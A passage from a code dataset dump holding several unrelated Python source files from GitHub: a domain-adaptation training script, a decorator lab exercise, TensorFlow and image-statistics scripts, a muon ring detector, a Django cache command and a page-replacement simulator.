default=2, type=int, metavar='', help='log verbosity level (0, 1, 2)')\n parser.add_argument('--seed', default=42, type=int, metavar='', help='random seed')\n args = vars(parser.parse_args())\n\n # override args with icfg (if provided)\n cfg = args.copy()\n if cfg['icfg'] is not None:\n cv_parser = ConfigParser()\n cv_parser.read(cfg['icfg'])\n cv_param_names = []\n for key, val in cv_parser.items('main'):\n cfg[key] = ast.literal_eval(val)\n cv_param_names.append(key)\n\n # dump cfg to a txt file for your records\n with open(cfg['output'] + '.txt', 'w') as f:\n f.write(str(cfg)+'\\n')\n\n # use a fixed random seed for reproducibility purposes\n if cfg['seed'] > 0:\n random.seed(cfg['seed'])\n np.random.seed(seed=cfg['seed'])\n torch.manual_seed(cfg['seed'])\n torch.cuda.manual_seed(cfg['seed'])\n\n device = 'cuda' if (cfg['use_cuda'] and torch.cuda.is_available()) else 'cpu'\n log = Logger(cfg['verbosity'])\n log.print('device:', device, level=0)\n\n if ('FS' in cfg['model']) or ('FM' in 
cfg['model']):\n # weak data augmentation (small rotation + small translation)\n data_aug = T.Compose([\n T.RandomAffine(5, translate=(0.125, 0.125)),\n T.ToTensor(),\n ])\n else:\n data_aug = T.ToTensor()\n\n # define all datasets\n datasets = {}\n datasets['MNIST'] = MNIST(train=True, path=os.path.join(cfg['data_path'], 'MNIST'), transform=data_aug)\n datasets['MNIST_M'] = MNIST_M(train=True, path=os.path.join(cfg['data_path'], 'MNIST_M'), transform=data_aug)\n datasets['SVHN'] = SVHN(train=True, path=os.path.join(cfg['data_path'], 'SVHN'), transform=data_aug)\n datasets['SynthDigits'] = SynthDigits(train=True, path=os.path.join(cfg['data_path'], 'SynthDigits'), transform=data_aug)\n if ('FS' in cfg['model']) or ('FM' in cfg['model']):\n test_set = deepcopy(datasets[cfg['target']])\n test_set.transform = T.ToTensor() # no data augmentation in test\n else:\n test_set = datasets[cfg['target']]\n\n # get a subset of cfg['n_images'] from each dataset\n # define public and private test sets: the private is not used at training time to learn invariant representations\n for ds_name in datasets:\n if ds_name == cfg['target']:\n indices = random.sample(range(len(datasets[ds_name])), cfg['n_tgt_images']+cfg['n_src_images'])\n test_pub_set = Subset(test_set, indices[0:cfg['n_tgt_images']])\n test_priv_set = Subset(test_set, indices[cfg['n_tgt_images']::])\n datasets[cfg['target']] = Subset(datasets[cfg['target']], indices[0:cfg['n_tgt_images']])\n else:\n indices = random.sample(range(len(datasets[ds_name])), cfg['n_src_images'])\n datasets[ds_name] = Subset(datasets[ds_name], indices[0:cfg['n_src_images']])\n\n # build the dataloader\n train_loader = MSDA_Loader(datasets, cfg['target'], batch_size=cfg['batch_size'], shuffle=True, device=device)\n test_pub_loader = DataLoader(test_pub_set, batch_size=4*cfg['batch_size'])\n test_priv_loader = DataLoader(test_priv_set, batch_size=4*cfg['batch_size'])\n valid_loaders = ({'target pub': test_pub_loader, 'target priv': test_priv_loader}\n if cfg['eval_target'] else None)\n log.print('target domain:', cfg['target'], '| source domains:', train_loader.sources, level=1)\n\n if cfg['model'] == 'FS':\n model = SimpleCNN().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n if valid_loaders is not None:\n del valid_loaders['target pub']\n fs_train_routine(model, optimizer, test_pub_loader, valid_loaders, cfg)\n elif cfg['model'] == 'FM':\n model = SimpleCNN().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n cfg['excl_transf'] = [Flip]\n fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'DANNS':\n for src in train_loader.sources:\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n dataset_ss = {src: datasets[src], cfg['target']: datasets[cfg['target']]}\n train_loader = MSDA_Loader(dataset_ss, cfg['target'], batch_size=cfg['batch_size'], shuffle=True, device=device)\n dann_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n torch.save(model.state_dict(), cfg['output']+'_'+src)\n elif cfg['model'] == 'DANNM':\n model = MODANet().to(device)\n optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n dann_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n elif cfg['model'] == 'MDAN':\n model = MDANet(len(train_loader.sources)).to(device)\n optimizer = 
optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        mdan_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n    elif cfg['model'] == 'MDANU':\n        model = MDANet(len(train_loader.sources)).to(device)\n        model.grad_reverse = nn.ModuleList([nn.Identity() for _ in range(len(model.domain_class))]) # remove grad reverse\n        task_optim = optim.Adadelta(list(model.feat_ext.parameters())+list(model.task_class.parameters()),\n                                    lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        adv_optim = optim.Adadelta(model.domain_class.parameters(),\n                                   lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        optimizers = (task_optim, adv_optim)\n        mdan_unif_train_routine(model, optimizers, train_loader, valid_loaders, cfg)\n    elif cfg['model'] == 'MDANFM':\n        model = MDANet(len(train_loader.sources)).to(device)\n        optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        mdan_fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n    elif cfg['model'] == 'MDANUFM':\n        model = MDANet(len(train_loader.sources)).to(device)\n        task_optim = optim.Adadelta(list(model.feat_ext.parameters())+list(model.task_class.parameters()),\n                                    lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        adv_optim = optim.Adadelta(model.domain_class.parameters(),\n                                   lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        optimizers = (task_optim, adv_optim)\n        cfg['excl_transf'] = [Flip]\n        mdan_unif_fm_train_routine(model, optimizers, train_loader, valid_loaders, cfg)\n    elif cfg['model'] == 'MODA':\n        model = MODANet().to(device)\n        optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        moda_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n    elif cfg['model'] == 'MODAFM':\n        model = MODANet().to(device)\n        optimizer = optim.Adadelta(model.parameters(), lr=cfg['lr'], weight_decay=cfg['weight_decay'])\n        cfg['excl_transf'] = [Flip]\n        moda_fm_train_routine(model, optimizer, train_loader, valid_loaders, cfg)\n    else:\n        raise ValueError('Unknown model {}'.format(cfg['model']))\n\n    if cfg['model'] != 'DANNS':\n        torch.save(model.state_dict(), cfg['output'])\n\nif __name__ == '__main__':\n    main()\n","repo_name":"dpernes/modafm","sub_path":"digits/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11138,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"13839172026","text":"import sys\n\nMESSAGE_LIST = []\n\ndef authorise(function):\n    \"\"\"\n    You need a function here authorise which contains another function called wrapper.\n    This function authenticates the token against CrocodileLikesStrawberries and if valid calls the function given as input,\n    authorise then needs to return wrapper.\n    \"\"\"\n    # Take in as many arguments as needed\n    def wrapper(*args, **kwargs):\n        # If token is invalid\n        if not authorised(args[0]):\n            raise Exception('Invalid token')\n        # Gets rid of the token from the arguments list to add them to the message_list\n        return function(*args[1:])\n    return wrapper\ndef authorised(auth_token1):\n    return auth_token1 == 'CrocodileLikesStrawberries'\n\n\n@authorise\ndef get_messages():\n    return MESSAGE_LIST\n\n@authorise\ndef add_messages(msg):\n    global MESSAGE_LIST\n    MESSAGE_LIST.append(msg)\n\nif __name__ == '__main__':\n    auth_token = \"\"\n    if len(sys.argv) == 2:\n        auth_token = sys.argv[1]\n    else:\n        auth_token = \"\"\n    #auth_token = 'CrocodileLikesStrawberries'\n    add_messages(auth_token, \"Hello\")\n    add_messages(auth_token, \"How\")\n    
add_messages(auth_token, \"Are\")\n add_messages(auth_token, \"You?\")\n print(get_messages(auth_token))\n","repo_name":"eleans412/COMP1531-21T1","sub_path":"labs/lab09/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"500078037","text":"import argparse\nfrom glob import glob\nfrom os.path import join\n\nimport numpy as np\nimport tqdm\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\ncolors = [\n [0, 0, 0],\n [70, 70, 70],\n [190, 153, 153],\n [72, 0, 90],\n [220, 20, 60],\n [153, 153, 153],\n [157, 234, 50],\n [128, 64, 128],\n [244, 35, 232],\n [107, 142, 35],\n [0, 0, 142],\n [102, 102, 156],\n [220, 220, 0],\n [250, 170, 30],\n [180, 165, 180],\n [111, 74, 0],\n [119, 11, 32],\n [0, 0, 230],\n [255, 0, 0],\n [152, 251, 152],\n [70, 130, 180],\n [230, 150, 140],\n [81, 0, 81],\n [0, 0, 0],\n [150, 100, 100],\n [45, 60, 150],\n [0, 0, 70]\n]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', type=str, default='../data/IDDA/', help='path of training data')\n\n args = parser.parse_args()\n\n files = glob(join(args.data, \"train_labels\", \"*.png\"))\n classes = 27+1\n shape = (1920, 1080)\n\n running_counts = np.zeros(classes, dtype=np.int32)\n for i, file in enumerate(tqdm.tqdm(files)):\n\n # Open the image\n label = np.array(Image.open(file))\n\n # Map each RGBA color to the first byte (represents the class)\n label_class = label[:, :, 0]\n\n # Count the occurrences of every class\n counts = np.bincount(label_class.flatten(), minlength=classes).astype(np.int32)\n running_counts += counts\n\n class_map = [11, 1, 4, 11, 5, 3, 6, 6, 7, 10, 2, 11, 8, 11, 11, 11, 0, 11, 11, 11, 9, 11, 11, 11, 1, 11, 11]\n classes = [\"unlabeled\", \"building\", \"fence\", \"other\", \"pedestrian\", \"pole\", \"roadline\", \"road\", \"sidewalk\", \"vegetation\", \"car\", \"wall\", \"tsign\", \"tlight\", \"guardrail\", \"dynamic\", \"bicycle\", \"motorcycle\", \"rider\", \"terrain\", \"sky\", \"railtrack\", \"ground\", \"statics\", \"bridge\", \"water\", \"truck\"] # used_classes = np.zeros(12)\n\n tot_pixels = len(files) * shape[0] * shape[1]\n running_counts[6] += running_counts[7]\n running_counts[7] = 0\n\n rel_freq = running_counts / tot_pixels\n alt_freq = 1 / (np.log(1.02 + (running_counts / tot_pixels)))\n\n for name, scaled, log_scaled in zip(classes, rel_freq, alt_freq):\n print(f\"name: {name}\\tscaled: {scaled:.5f}\\tlog-scaled: {log_scaled:.5f}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Nico995/Self-Supervised-Adversarial-Domain-Adaptation-in-Sematic-Segmentation","sub_path":"tools/class_frequencies.py","file_name":"class_frequencies.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34289402061","text":"import tensorflow as tf\n\nn_steps = 28\nn_inputs = 28\nneurons = [100, 50, 20]\nn_outputs = 10\nn_layers = 3\n\nlearning_rate = 0.001\n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.int32, [None])\n# lstm_cells = [tf.nn.rnn_cell.BasicLSTMCell(num_units=neurons[layer])\n# for layer in range(n_layers)]\n#lstm_cells = [tf.contrib.rnn.LSTMBlockCell(num_units=neurons[layer])\n# for layer in range(n_layers)]\nlstm_cells = [tf.contrib.cudnn_rnn.CudnnCompatibleLSTMCell(num_units=neurons[layer])\n for layer in range(n_layers)]\nmulti_cell = 
tf.nn.rnn_cell.MultiRNNCell(lstm_cells)\noutputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)\nprint(outputs.shape)\nfor state in states:\n print(state[0].shape, state[1].shape)\ntop_layer_h_state = states[-1][1]\nlogits = tf.layers.dense(top_layer_h_state, n_outputs, name=\"softmax\")\nxentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)\nloss = tf.reduce_mean(xentropy, name=\"loss\")\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\ncorrect = tf.nn.in_top_k(logits, y, 1)\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\ninit = tf.global_variables_initializer()\n\nn_epochs = 20\nbatch_size = 100\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"../data/\")\nX_test = mnist.test.images.reshape((-1, n_steps, n_inputs))\ny_test = mnist.test.labels\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(mnist.train.num_examples // batch_size):\n X_batch, y_batch = mnist.train.next_batch(batch_size)\n X_batch = X_batch.reshape((batch_size, n_steps, n_inputs))\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test})\n print(\"Epoch\", epoch, \"Train accuracy =\", acc_train, \"Test accuracy =\", acc_test)\n","repo_name":"fancyerii/deep_learning_theory_and_practice","sub_path":"src/ch6/lstm-mnist.py","file_name":"lstm-mnist.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"61"} +{"seq_id":"71667418754","text":"import numpy as np\nfrom skimage.measure import ransac\nfrom skimage.measure import CircleModel\nfrom .tools import circle_overlapp\nfrom .tools import tight_circle_on_off_region\nfrom .tools import xy2polar\n\ndeg2rad = np.deg2rad(1)\n\n\ndef detection_with_simple_ring_fit(\n event,\n clusters,\n initial_circle_model_min_samples=3,\n initial_circle_model_residual_threshold=0.25,\n initial_circle_model_max_trails=15,\n initial_circle_model_min_photon_ratio=0.6,\n density_circle_model_residual_threshold=0.20,\n density_circle_model_min_on_off_ratio=3.5,\n density_circle_model_max_ratio_photon_inside_ring=0.25,\n min_circumference_of_muon_ring_in_field_of_view=1.5,\n max_arrival_time_stddev=5e-9,\n min_overlap_of_muon_ring_with_field_of_view=0.2,\n min_muon_ring_radius=0.45,\n max_muon_ring_radius=1.6\n):\n \"\"\"\n Detects muon events.\n A dictionary of muon relevant features is returned.\n\n Parameter\n ---------\n\n event FACT event.\n\n clusters Photons-stream cluster of the event.\n \"\"\"\n initial_circle_model_residual_threshold *= deg2rad\n density_circle_model_residual_threshold *= deg2rad\n min_muon_ring_radius *= deg2rad\n max_muon_ring_radius *= deg2rad\n min_circumference_of_muon_ring_in_field_of_view *= deg2rad\n\n ret = {}\n ret['is_muon'] = False\n\n field_of_view_radius = event.photon_stream.geometry.fov_radius\n\n full_cluster_mask = clusters.labels >= 0\n number_of_photons = full_cluster_mask.sum()\n\n ret['number_of_photons'] = number_of_photons\n if number_of_photons < initial_circle_model_min_samples:\n return ret\n\n flat_photon_stream = clusters.point_cloud\n full_clusters_fps = flat_photon_stream[full_cluster_mask]\n\n with np.errstate(invalid='ignore'):\n circle_model, inliers = ransac(\n data=full_clusters_fps[:, 0:2], # only cx and cy not the 
time\n model_class=CircleModel,\n min_samples=initial_circle_model_min_samples,\n residual_threshold=initial_circle_model_residual_threshold,\n max_trials=initial_circle_model_max_trails)\n\n cx = circle_model.params[0]\n cy = circle_model.params[1]\n r = circle_model.params[2]\n\n ret['muon_ring_cx'] = cx\n ret['muon_ring_cy'] = cy\n ret['muon_ring_r'] = r\n\n if r < min_muon_ring_radius or r > max_muon_ring_radius:\n return ret\n\n muon_ring_overlapp_with_field_of_view = circle_overlapp(\n cx1=0.0,\n cy1=0.0,\n r1=field_of_view_radius,\n cx2=cx,\n cy2=cy,\n r2=r)\n\n ret['muon_ring_overlapp_with_field_of_view'] = (\n muon_ring_overlapp_with_field_of_view\n )\n if (\n muon_ring_overlapp_with_field_of_view <\n min_overlap_of_muon_ring_with_field_of_view\n ):\n return ret\n\n arrival_time_stddev = full_clusters_fps[:, 2].std()\n ret['arrival_time_stddev'] = arrival_time_stddev\n if arrival_time_stddev > max_arrival_time_stddev:\n return ret\n\n ret['mean_arrival_time_muon_cluster'] = full_clusters_fps[:, 2].mean()\n\n number_of_ring_photons = inliers.sum()\n initial_circle_model_photon_ratio = (\n number_of_ring_photons/number_of_photons\n )\n ret['initial_circle_model_photon_ratio'] = (\n initial_circle_model_photon_ratio\n )\n if (\n initial_circle_model_photon_ratio <\n initial_circle_model_min_photon_ratio\n ):\n return ret\n\n visible_ring_circumfance = r*2*np.pi*muon_ring_overlapp_with_field_of_view\n ret['visible_muon_ring_circumfance'] = visible_ring_circumfance\n if (\n visible_ring_circumfance <\n min_circumference_of_muon_ring_in_field_of_view\n ):\n return ret\n\n # circle model ON/OFF ratio\n # -------------------------\n\n onoff = tight_circle_on_off_region(\n cx=cx,\n cy=cy,\n r=r,\n residual_threshold=density_circle_model_residual_threshold,\n xy=full_clusters_fps[:, 0:2])\n\n on_density = onoff['on'].sum()/onoff['area_on']\n inner_off_density = onoff['inner_off'].sum()/onoff['area_inner_off']\n outer_off_density = onoff['outer_off'].sum()/onoff['area_outer_off']\n\n off_density = (outer_off_density + inner_off_density)/2\n\n if off_density == 0:\n return ret\n\n on_off_ratio = on_density/off_density\n\n ret['density_circle_model_on_off_ratio'] = on_off_ratio\n if on_off_ratio < density_circle_model_min_on_off_ratio:\n return ret\n\n number_of_photons_inside_ring_off = onoff['inside_off'].sum()\n ratio_inside_circle = number_of_photons_inside_ring_off/number_of_photons\n ret['density_circle_model_inner_ratio'] = ratio_inside_circle\n if ratio_inside_circle > density_circle_model_max_ratio_photon_inside_ring:\n return ret\n\n # ring population\n # ----------------\n xy_relative_to_ring_center = full_clusters_fps\n xy_relative_to_ring_center[:, 0] -= cx\n xy_relative_to_ring_center[:, 1] -= cy\n\n rphi = xy2polar(xy=xy_relative_to_ring_center[:, 0:2])\n\n number_bins = 3*int(np.ceil(np.sqrt(number_of_photons)))\n phi_bin_edgeds = np.linspace(-np.pi, np.pi, number_bins)\n ring_population_hist, phi_bin_edgeds = np.histogram(\n rphi[:, 1],\n bins=phi_bin_edgeds)\n\n # phi_bin_centers = phi_bin_edgeds[: -1]\n # bin_pos_x = np.cos(phi_bin_centers)*r + cx\n # bin_pos_y = np.sin(phi_bin_centers)*r + cy\n # bins_inside_fov = (\n # np.sqrt(bin_pos_x**2 + bin_pos_y**2) <\n # field_of_view_radius\n # )\n # mean_photons = ring_population_hist[bins_inside_fov].mean()\n\n # continues ring population\n # -------------------------\n min_ring_circumfance = 2.5*deg2rad\n ring_circumfance = 2*r*np.pi\n min_ring_fraction = min_ring_circumfance/ring_circumfance\n\n if min_ring_fraction < 0.33:\n 
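 # Editor's note (sketch, not from the original file): this floor keeps the
 # scanned window at least a third of the ring. The wrapped-window scan below
 # relies on np.take with mode='wrap', which reads indices modulo the array
 # length, e.g.
 #   np.take(np.array([1, 2, 3]), range(2, 5), mode='wrap')  ->  [3, 1, 2]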
min_ring_fraction = 0.33\n\n number_of_fraction_bins = int(np.round(min_ring_fraction*number_bins))\n\n is_populated_evenly = False\n is_populated_at_all = False\n most_even_population_std = 1e99\n for i in range(ring_population_hist.shape[0]):\n section = np.take(\n ring_population_hist,\n range(i, i+number_of_fraction_bins),\n mode='wrap')\n\n if (section > 0).sum() >= 0.5*number_of_fraction_bins:\n is_populated_at_all = True\n rel_std = section.std()/section.mean()\n if rel_std < most_even_population_std:\n most_even_population_std = rel_std\n\n if is_populated_at_all and most_even_population_std < 0.8:\n is_populated_evenly = True\n\n if is_populated_evenly:\n ret['is_muon'] = True\n\n return ret\n","repo_name":"fact-project/muons","sub_path":"muons/detection_with_simple_ring_fit.py","file_name":"detection_with_simple_ring_fit.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"46854609830","text":"import numpy as np\n\nDELIMINATOR = ' ' # field delimiter\nLASTSTEPSHOLDOUTFORTEST = 0 # number of trailing steps per path held out for testing; 0 means no train/test split\nMINLENGTHFORTRAIN = 1 # minimum trajectory length for the training set\n\ndef ReadSequentialData(DataPath):\n '''\n Read the data and return it as a list of trajectories.\n Input: path of the raw data file\n Output: raw data\n Globals: LASTSTEPSHOLDOUTFORTEST/MINLENGTHFORTRAIN\n '''\n print('Reading raw data...')\n # get the total number of records\n with open(DataPath) as f:\n lines = f.readlines()\n totalLines = len(lines)\n print(\"Total number of lines: %d\" % totalLines)\n\n RawTrajectories = []\n LoopCounter = 0\n\n with open(DataPath) as f:\n lines = f.readlines()\n for line in lines:\n fields = line.strip().split(DELIMINATOR)\n ## In the taxi trajectory data, the first field of each line is the taxi ID and the rest are geographic positions\n ## Format: [Taxi 1] [Position 1] [Position 2] [Position 3]...\n shipId = fields[0]\n movements = fields[1:]\n\n LoopCounter += 1\n if LoopCounter % 5000 == 0:\n print(\"Progress: %d%%\" % (LoopCounter*100/totalLines))\n elif LoopCounter == totalLines:\n print(\"Progress: 100%\")\n\n ## data preprocessing can be added below\n\n ## filter out noise\n MinMovementLength = MINLENGTHFORTRAIN + LASTSTEPSHOLDOUTFORTEST\n if len(movements) < MinMovementLength:\n continue\n\n RawTrajectories.append([shipId, movements])\n return RawTrajectories, totalLines\n","repo_name":"NightGlory/DHONE","sub_path":"read_shipping.py","file_name":"read_shipping.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9527989600","text":"from __future__ import unicode_literals\n\nfrom django.core.management.base import BaseCommand\nfrom django.core import cache\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n new_cache_name = 'default'\n old_cache_name = 'insecure'\n old_key_prefix = 'register'\n new_prefix = 'register:secure'\n delete_old_keys = False\n\n old_cache = cache.caches[old_cache_name]\n new_cache = cache.caches[new_cache_name]\n\n # Use low level api to access full key name\n existing_keys = old_cache.client.get_client().keys('{}*'.format(old_key_prefix))\n for key in existing_keys:\n if new_prefix not in key:\n actual_key = old_cache.client.reverse_key(key)\n unencrypted_val = old_cache.get(actual_key)\n if new_cache.set(actual_key, unencrypted_val):\n if delete_old_keys:\n old_cache.delete(actual_key)\n","repo_name":"foundertherapy/register","sub_path":"registration/management/commands/secure_redis.py","file_name":"secure_redis.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"29975494668","text":"# This is an example 
VISAN script for the MIP_NL__2P product\n\n# Make sure to set the 'products-file directory' option in the VISAN Preferences panel to\n# a directory containing MIP_NL__2P products.\n\n# This example will then take all products it finds in this directory and\n# for these products plot the ozone profiles and geolocation\n\n\ndef run():\n\n import glob\n import os\n import wx\n\n productdir = str(wx.Config.Get().Read('DirectoryLocation/Products'))\n\n # Use glob to find all files in productdir starting with 'MIP_NL__2P'\n files = glob.glob(os.path.join(productdir, \"MIP_NL__2P*\"))\n\n if len(files) == 0:\n print((\"Could not find any MIP_NL__2P files in directory '\" + productdir + \"'\"))\n return\n\n # We ingest the ozone profile data\n # By providing a minimum value for the O3 vmr we also automatically filter out all NaN values\n data = harp.import_product(files, 'O3_volume_mixing_ratio>=0', 'species=O3')\n\n wplot(data, projection=\"Plate Caree\", pointsize=3, colortable='RedToGreen')\n plot(data, showpropertypanel=True, color=(0, 1, 0), title=\"MIP_NL__2P profile example\")\n\n\nrun()\n","repo_name":"stcorp/visan","sub_path":"visan/examples/MIP_NL__2P_location.py","file_name":"MIP_NL__2P_location.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"1289404732","text":"import sys\n\n#M\nmachineSize = int(sys.argv[1])\n#P\npageSize = int(sys.argv[2])\n#S\nprocessSize = int(sys.argv[3])\n#J\njobMix = int(sys.argv[4])\n#N\nnumRef = int(sys.argv[5])\n#R\nreplacementAlgo = sys.argv[6]\n\ndebugLevel = int(sys.argv[7])\n\n\nrandomNumbers = None\nwith open(\"random-numbers.txt\") as f:\n randomNumbers = f.readlines()\n\n# a global counter to keep track of index of random number from txt file\ncounter = 0\ndef randomOS(counter):\n num = int(randomNumbers[int(counter)])\n if debugLevel == 11:\n print(int(randomNumbers[int(counter)]))\n return num\n\nclass Process:\n def __init__(self, processSize, processNum):\n self.processSize = int(processSize)\n self.numFault = 0\n self.numEvict = 0\n # residence time\n self.resTime = 0\n # given on instruction\n self.nextRef = (111 * processNum) % processSize\n\n def nRef(self, A, B, C):\n global counter\n randomNum = randomOS(counter)\n counter += 1\n ratio = randomNum / 2147483648\n if ratio < A:\n self.nextRef = (self.nextRef + 1) % self.processSize\n elif ratio < A + B:\n self.nextRef = (self.nextRef - 5 + self.processSize) % self.processSize\n elif ratio < A + B + C:\n self.nextRef = (self.nextRef + 4) % self.processSize\n else:\n randomN = randomOS(counter)\n self.nextRef = randomN % self.processSize\n counter += 1\n\n\nclass FrameTable:\n\n def __init__(self, frameNum, type):\n self.frameNum = frameNum\n # algorithm type being used\n self.type = type\n self.table = []\n self.count = 0\n for i in range(int(frameNum)):\n self.table.append([])\n for p in self.table:\n p.append(0)\n p.append(0)\n p.append(0)\n p.append(0)\n\n # check page fault\n def hasFault(self, pageNum, processNum, time):\n hasF = True\n for page in self.table:\n # if page demand is in the table, then there's no fault\n if page[0] == pageNum and page[1] == processNum:\n if self.type == \"lru\":\n page[2] = time\n hasF = False\n\n return hasF\n\n def replace(self, plist, pageNum, processNum, time):\n if self.type == \"fifo\":\n # find empty frames\n emptyFrames = -1\n\n for i in range(len(self.table)):\n if self.table[i][0] == 0 and self.table[i][1] == 0:\n # store the empty frame\n emptyFrames 
= i\n break\n\n # evict if there's no empty frame\n if emptyFrames == -1:\n evictedFrame = self.table[0]\n evictedProcess = plist[int(evictedFrame[1]) - 1]\n resTime = int(time - evictedFrame[2])\n evictedProcess.numEvict += 1\n evictedProcess.resTime += resTime\n # hold previous values\n temp = []\n for i in range(len(self.table)):\n temp.append([])\n for i in range(len(self.table)-1):\n temp[i] = self.table[i + 1]\n # remove just the first frame\n self.table = temp\n emptyFrames = len(self.table) - 1\n\n # add new values\n self.table[emptyFrames] = [pageNum, processNum, time, time]\n\n else:\n LRUTime = int(time)\n evictedFrame = 0\n # check for frames not used, starting from highest address\n for i in range(int(self.frameNum) - 1, -1, -1):\n if self.table[i][0] == 0 and self.table[i][1] == 0:\n # empty frame found\n self.table[i] = [pageNum, processNum, time, time]\n return\n elif self.type == \"lru\" and LRUTime > self.table[i][2]:\n # index of evicted frame\n evictedFrame = i\n LRUTime = self.table[i][2]\n\n evictedProcess = None\n resTime = None\n if self.type == \"lru\":\n evictedProcess = plist[self.table[evictedFrame][1] - 1]\n resTime = time - self.table[evictedFrame][3]\n else:\n global counter\n evictedFrame = int(randomOS(counter) % int(self.frameNum))\n counter += 1\n evictedProcess = plist[self.table[int(evictedFrame)][1] - 1]\n resTime = time - self.table[evictedFrame][2]\n\n evictedProcess.numEvict += 1\n evictedProcess.resTime += resTime\n\n # add replacement to the evicted frame\n self.table[evictedFrame] = [pageNum, processNum, time, time]\n self.count += 1\n\n\ndef main():\n global machineSize\n global pageSize\n global processSize\n global jobMix\n global numRef\n global replacementAlgo\n global debugLevel\n\n print(\"The machine size is \" + str(machineSize) + \".\")\n print(\"The page size is \" + str(pageSize) + \".\")\n print(\"The process size size is \" + str(processSize) + \".\")\n print(\"The job mix number is \" + str(jobMix) + \".\")\n print(\"The number of references per process is \" + str(numRef) + \".\")\n print(\"The replacement algorithm is \" + str(replacementAlgo) + \".\")\n print(\"The level of debugging output is \" + str(debugLevel) + \".\")\n\n quantum = 3\n totalFault = 0\n totalEvict = 0\n totalRes = 0\n A = []\n B = []\n C = []\n maxIteration = int(int(numRef) / int(quantum))\n frameNum = int(machineSize / pageSize)\n frameTable = FrameTable(frameNum, replacementAlgo)\n\n if jobMix == 1:\n plist = []\n plist.append(Process(processSize, 1))\n for i in range(numRef):\n pageNumber = int(plist[0].nextRef / pageSize)\n if frameTable.hasFault(pageNumber, 1, i+1):\n frameTable.replace(plist, pageNumber, 1, i+1)\n plist[0].numFault += 1\n plist[0].nRef(1, 0, 0)\n else:\n plist = []\n for i in range(4):\n plist.append([])\n plist[i] = Process(processSize, i+1)\n\n # given values in the instruction\n if jobMix == 2:\n A = [1, 1, 1, 1]\n B = [0, 0, 0, 0]\n C = [0, 0, 0, 0]\n\n elif jobMix == 3:\n A = [0, 0, 0, 0]\n B = [0, 0, 0, 0]\n C = [0, 0, 0, 0]\n\n elif jobMix == 4:\n A = [0.75, 0.75, 0.75, 0.5]\n B = [0.25, 0, 0.125, 0.125]\n C = [0, 0.25, 0.125, 0.125]\n\n count = None\n for i in range(maxIteration + 1):\n for j in range(4):\n # check for final iteration\n if i == maxIteration:\n count = numRef % quantum\n else:\n count = quantum\n for k in range(count):\n pageNumber = int(plist[j].nextRef / pageSize)\n time = (quantum * i * 4) + k + 1 + (j * count)\n if frameTable.hasFault(pageNumber, j+1, time):\n frameTable.replace(plist, pageNumber, j + 1, 
